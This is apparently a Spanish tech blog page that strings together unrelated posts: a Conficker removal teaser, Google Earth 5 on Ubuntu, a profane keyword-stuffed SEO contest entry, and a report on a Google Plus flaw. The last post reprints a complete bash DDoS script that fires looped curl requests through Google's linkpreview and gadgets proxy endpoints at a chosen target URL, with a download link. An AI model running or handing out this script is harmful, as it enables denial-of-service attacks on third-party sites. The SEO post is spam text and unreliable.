Herramientas para eliminar virus Conficker (Downadup)

El pasado mes de enero se multiplicaban las noticias en prensa y blogs del  contagio de millones de ordenadores causado por un nuevo virus llamado Downadup, también conocido como Conficker. Titulares como el leído hoy  en 20minutos.es, Microsoft sugiere a los usuarios afectados por Downadup que reinstalen el sistema” no aporta muchas soluciones al tema.

¿Está mi ordenador infectado?

Afecta a todos los sistemas operativos Windows, desde 95 hasta Vista pasando por Windows NT y Server 2003. Si tu ordenador intenta acceder a determinadas direcciones de Internet para descargarse otros programas maliciosos y además te impide la actualización de los programas antivirus, es muy probable de que estés bajo sus efectos.

La infección se puede realizar de tres formas:

Continuar leyendo «Herramientas para eliminar virus Conficker (Downadup)»

Google Earth 5 en Ubuntu – Linux

Hace un par de días se presentó una nueva e impresionante versión de Google Earth, probablemente la aplicación cartográfica más potente de la historia (si Cristobal Colón levantara la cabeza…). La oferta de Google Earth sigue ampliándose a medida que pasan versiones, y ahora, como todos sabréis, van más allá de la exploración de países y continentes para adentrarse en el océano.

google earth 5
Google Earth 5 en Ubuntu

Continuar leyendo «Google Earth 5 en Ubuntu – Linux»

Raiola Manda Y No El Panda

raiola manda y no el panda

raiola manda y no el panda

Seguro? seguro que raiola manda y no el panda? no me lo puedo creer mira que a raiola lo podemos tirar en 0.2 y entonces el panda mandaría mas que raiola. Aguantará raiola a las ostias del panda? el panda manda? Esto no es nada más que un puto concurso SEO de ver que raiola manda y no el panda se posiciona en google en el puto primer ranking de google españa escribiendo «raiola manda y no el panda»

Que dirá Alvaro Fontela CEO de

Raiola manda y no el panda

?? que manda mas que el algoritmo panda de google?? comerá mas raiola manda y no el panda? oioioioioioi, veremos a ver que pasa en este raiola manda

A mi me molan los pandas, pero a quién le mola raiola?

raiola manda y no el panda

 

Se referirán a Mino Raiola ???? o se referirán a raiola network?? lo veo claro que raiola manda y no el panda

No lo acabo de entender… mi no entender la puta keyword de los cojones… que me lo expliquen los de este concurso de SEO de David Ayala (con el que cenamos una noche en barcelona a la luz de las velas…) que bonito fue 😀

raiola manda y no el panda
raiola manda y no el panda

Que me expliquen porque han puesto de keyword

raiola manda y no el panda y punto!!!

https://www.youtube.com/watch?v=LW_O5E_vVtk

¿Quien Ganara El Concurso De Raiola Manda Y No El Panda?

¡Buena pregunta! En eso estamos, la idea es batirse el cobre con los mejores seos que tengan la cartera bien llenita como para jugar dura para llevarse el pedazo de premio de 5000€. Con esas cantidades no hay escapatoria, el que tenga una buena cartera lleva una ventaja innegable. ¿Quién será capaz de lograr el mejor ratio inversión/retorno?. De momento por lo que se ve en los grupos la cosa va a estar movidita y hay seos de mucho nivel intentando llevarse el premio del osito y la empresa de hosting a casa. 

 

¿Cual Es El Importe Del Premio del concurso SEO Raiola Manda Y No El Panda ???

Pues nada más y nada menos que 5000€ de premio, ole, ole, ole! David y Dean se lo han currado para este concurso. Eso si se echa en falta un premio para el segundo y tercero y algo para que el que sea capaz de hacerlo de la forma más white y la más black posible. Pero no, el premio de consolación es un bonito cero patatero, palmadita en la espalda, y a lo sumo un pin!

¿Quien Puede Participar en Raiola Manda Y No El Panda?

Pues además de los fans de Raiola y de los osos panda con manchitas al más puro estilo google el concurso está abierto a cualquier persona que se atreva a meterse en un berenjenal de estos, así que, nos vemos en las SERPS, que esto acaba de empezar señores!.

“Raiola manda y no el panda”

mejores movil de menos de 100e

Fallo de seguridad en los servidores de Google Plus

Google Plus

Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini 😀

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear